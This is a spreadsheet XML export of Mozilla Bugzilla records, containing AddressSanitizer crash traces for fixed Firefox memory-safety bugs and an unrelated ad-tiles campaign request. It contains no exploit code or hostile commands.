    #15 0x7f73f13e8efa in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:265:37
    #16 0x7f73f26eae4a in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #17 0x7f73f26e82ce in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #18 0x7f73f269d445 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1106:52
    #19 0x7f73f269f40c in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1308:15
    #20 0x7f73f268226e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #21 0x7f73f268226e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:424
    #22 0x7f73f2680513 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:641:16
    #23 0x7f73f2686fe8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1156:11
    #24 0x7f73f5316c06 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1167:7
    #25 0x7f73f81afe24 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7151:21
    #26 0x7f73f81aae97 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6942:7
    #27 0x7f73f81b4327 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #28 0x7f73ed4da465 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1307:3
    #29 0x7f73ed4d904c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:850:14
    #30 0x7f73ed4d4b39 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:739:9
    #31 0x7f73ed4d7412 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:628:5
    #32 0x7f73ed4d8b74 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #33 0x7f73eaf164d2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #34 0x7f73eee27de7 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8351:18
    #35 0x7f73eee27de7 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8273
    #36 0x7f73eee031fc in nsIDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5297:3
    #37 0x7f73eef6939b in applyImpl&lt;nsIDocument, void (nsIDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1191:12
    #38 0x7f73eef6939b in apply&lt;nsIDocument, void (nsIDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1197
    #39 0x7f73eef6939b in mozilla::detail::RunnableMethodImpl&lt;nsIDocument*, void (nsIDocument::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1242
    #40 0x7f73eac56be5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
    #41 0x7f73eac93c06 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1252:14
    #42 0x7f73eac9c72d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:530:10
    #43 0x7f73ebeb3df3 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #44 0x7f73ebdb69dc in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #45 0x7f73ebdb69dc in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #46 0x7f73ebdb69dc in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #47 0x7f73f4ab7573 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #48 0x7f73f8f75a6e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:939:22
    #49 0x7f73ebdb69dc in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #50 0x7f73ebdb69dc in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #51 0x7f73ebdb69dc in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #52 0x7f73f8f74b13 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:765:34
    #53 0x55a4bad84b91 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #54 0x55a4bad84b91 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:287
    #55 0x7f740ced1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #56 0x55a4bacb3f3c in _start (/home/nils/fuzzer3/firefox/firefox+0x2cf3c)
0x6120000aef68 is located 40 bytes inside of 288-byte region [0x6120000aef40,0x6120000af060)
freed by thread T0 (file:// Content) here:
    #0 0x55a4bad54372 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7f73eaa98d51 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2740:7
    #2 0x7f73eaa97500 in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2963:3
    #3 0x7f73eaaa39af in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3996:3
    #4 0x7f73eaaa2c84 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3817:9
    #5 0x7f73eaaa7c13 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4408:21
    #6 0x7f73eef234ee in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1526:3
    #7 0x7f73f1703d41 in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:60:3
    #8 0x7f73fac5f60b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468:15
    #9 0x7f73fac5f60b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:560
    #10 0x7f73fac4858e in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:620:12
    #11 0x7f73fac4858e in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3458
    #12 0x7f73fac2d85b in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447:12
    #13 0x7f73fac6011e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:587:15
    #14 0x7f73fac61eb2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:633:10
    #15 0x7f73f9d3550d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2979:12
    #16 0x7f73f13eee9e in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:52:8
    #17 0x7f73f269d3ec in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #18 0x7f73f269d3ec in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1103
    #19 0x7f73f269f40c in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1308:15
    #20 0x7f73f268226e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #21 0x7f73f268226e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:424
    #22 0x7f73f2680a14 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:677:14
    #23 0x7f73f2686fe8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1156:11
    #24 0x7f73ee8f0170 in nsContentUtils::MaybeFireNodeRemoved(nsINode*, nsINode*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4759:5
    #25 0x7f73eef0a49c in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:2292:7
    #26 0x7f73f1ae800e in mozilla::dom::HTMLOptionsCollection_Binding::add(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLOptionsCollection*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLOptionsCollectionBinding.cpp:170:9
    #27 0x7f73f1e4f270 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3315:13
    #28 0x7f73fac5f60b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468:15
    #29 0x7f73fac5f60b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:560
    #30 0x7f73fac4858e in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:620:12
    #31 0x7f73fac4858e in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3458
    #32 0x7f73fac2d85b in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447:12
    #33 0x7f73fac6011e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:587:15
    #34 0x7f73fac61eb2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:633:10
    #35 0x7f73f9d3550d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2979:12
previously allocated by thread T0 (file:// Content) here:
    #0 0x55a4bad546b3 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x55a4bad85acd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
    #2 0x7f73f2adc8e1 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:139:12
    #3 0x7f73f2adc8e1 in NS_NewHTMLSelectElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLSelectElement.cpp:40
    #4 0x7f73f2b94c17 in CreateHTMLElement(unsigned int, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:255:41
    #5 0x7f73ee9308d9 in nsContentUtils::NewXULOrHTMLElement(mozilla::dom::Element**, mozilla::dom::NodeInfo*, mozilla::dom::FromParser, nsAtom*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:10153:18
    #6 0x7f73f2b94aeb in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAtom*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:238:10
    #7 0x7f73eef7fd0c in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsTSubstring&lt;char16_t&gt; const*) /builds/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:192:12
    #8 0x7f73eee0b045 in nsIDocument::CreateElementNS(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::ElementCreationOptionsOrString const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5796:8
    #9 0x7f73f1453148 in mozilla::dom::Document_Binding::createElementNS(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1360:59
    #10 0x7f73f1e4f270 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3315:13
    #11 0x7f73fac5f60b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468:15
    #12 0x7f73fac5f60b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:560
    #13 0x7f73fac4858e in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:620:12
    #14 0x7f73fac4858e in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3458
    #15 0x7f73fac2d85b in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447:12
    #16 0x7f73fac6011e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:587:15
    #17 0x7f73fac61eb2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:633:10
    #18 0x7f73f9d3550d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2979:12
    #19 0x7f73f13e8efa in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:265:37
    #20 0x7f73f26eae4a in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #21 0x7f73f26e82ce in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #22 0x7f73f269d445 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1106:52
    #23 0x7f73f269f40c in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1308:15
    #24 0x7f73f268226e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #25 0x7f73f268226e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:424
    #26 0x7f73f2680513 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:641:16
    #27 0x7f73f2686fe8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1156:11
    #28 0x7f73f5316c06 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1167:7
    #29 0x7f73f81afe24 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7151:21
    #30 0x7f73f81aae97 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6942:7
    #31 0x7f73f81b4327 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #32 0x7f73ed4da465 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1307:3
    #33 0x7f73ed4d904c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:850:14
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/base/nsINode.h:953:12 in GetParentNode
Shadow bytes around the buggy address:
  0x0c248000dd90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248000dda0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c248000ddb0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c248000ddc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c248000ddd0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
=&gt;0x0c248000dde0: fa fa fa fa fa fa fa fa fd fd fd fd fd[fd]fd fd
  0x0c248000ddf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248000de00: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c248000de10: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c248000de20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c248000de30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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5482==ABORTING</t>
        </is>
      </c>
      <c r="X3232" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3233">
      <c r="A3233" t="n">
        <v>1197290</v>
      </c>
      <c r="B3233" t="inlineStr">
        <is>
          <t>2015-08-21 10:40:07 -0700</t>
        </is>
      </c>
      <c r="C3233" t="inlineStr">
        <is>
          <t>Tiles Campaign - Conde_Wired Content ST_082415</t>
        </is>
      </c>
      <c r="D3233" t="inlineStr">
        <is>
          <t>2015-08-21 14:37:46 -0700</t>
        </is>
      </c>
      <c r="E3233" t="n">
        <v>1</v>
      </c>
      <c r="F3233" t="n">
        <v>1</v>
      </c>
      <c r="G3233" t="n">
        <v>6</v>
      </c>
      <c r="H3233" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3233" t="inlineStr">
        <is>
          <t>Content Services Graveyard</t>
        </is>
      </c>
      <c r="J3233" t="inlineStr">
        <is>
          <t>Traffic</t>
        </is>
      </c>
      <c r="K3233" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3233" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3233" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3233" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3233" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3233" t="inlineStr"/>
      <c r="Q3233" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3233" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3233" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3233" t="n">
        <v>1</v>
      </c>
      <c r="U3233" t="n">
        <v>0</v>
      </c>
      <c r="V3233" t="n">
        <v>4</v>
      </c>
      <c r="W3233" t="inlineStr">
        <is>
          <t>Hi Nan,
Here is the new set of Conde Nast content tiles. Please note Conde Nast is the master brand, BUT the content provider/ campaign is WIRED. Let me know if you have any questions on this! I'll ping you.
This are to go live on Monday August 24th.
IMPORTANT - - Client: Conde Nast
IMPORTANT - - Campaign: WIRED_Content ST_082415
Flight date: 8/24/2015 - 8/30/2015
Cover Image and Rollover Image, See Doc:
https://drive.google.com/a/mozilla.com/folderview?id=0BxewfJCzF7alfkR0ME43Zk4yZ2toNmlZQzdOcEVFYnYtYmZXT21qczBLeW9UX3hfTDBOa2s&amp;usp=sharing
Category and URL, See Doc:
https://docs.google.com/spreadsheets/d/1NtCLgJWZCJWOXpsJENxoQNhquuEil1UltleaRuHevVk/edit?usp=sharing
Thanks and let me know if you have any questions
-A</t>
        </is>
      </c>
      <c r="X3233" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3234">
      <c r="A3234" t="n">
        <v>826163</v>
      </c>
      <c r="B3234" t="inlineStr">
        <is>
          <t>2013-01-02 22:35:36 -0800</t>
        </is>
      </c>
      <c r="C3234" t="inlineStr">
        <is>
          <t>Out-of-bound read in gfxSkipCharsIterator::SetOffsets</t>
        </is>
      </c>
      <c r="D3234" t="inlineStr">
        <is>
          <t>2013-11-26 17:40:25 -0800</t>
        </is>
      </c>
      <c r="E3234" t="n">
        <v>1</v>
      </c>
      <c r="F3234" t="n">
        <v>1</v>
      </c>
      <c r="G3234" t="n">
        <v>3</v>
      </c>
      <c r="H3234" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3234" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3234" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3234" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3234" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3234" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3234" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3234" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3234" t="inlineStr">
        <is>
          <t>[asan][adv-main21+]</t>
        </is>
      </c>
      <c r="Q3234" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3234" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3234" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T3234" t="n">
        <v>1</v>
      </c>
      <c r="U3234" t="n">
        <v>0</v>
      </c>
      <c r="V3234" t="n">
        <v>16</v>
      </c>
      <c r="W3234" t="inlineStr">
        <is>
          <t>Created attachment 697345
Testcase
Reproduces on trunk.
&gt;==20823== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2a4ada32cc at pc 0x7f2a7fc58c4c bp 0x7fff9bb19a10 sp 0x7fff9bb19a08
&gt;READ of size 4 at 0x7f2a4ada32cc thread T0
&gt;    #0 0x7f2a7fc58c4b in gfxSkipCharsIterator::SetOffsets(unsigned int, bool) src/gfx/thebes/gfxSkipChars.cpp:91
&gt;    #1 0x7f2a71fedf14 in gfxSkipCharsIterator::SetOriginalOffset(int) src/../../../dist/include/gfxSkipChars.h:232
&gt;    #2 0x7f2a728d57a8 in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, bool, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsTextFrameThebes.cpp:7877
&gt;    #3 0x7f2a726cfc69 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:847
&gt;    #4 0x7f2a7269fc7d in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:680
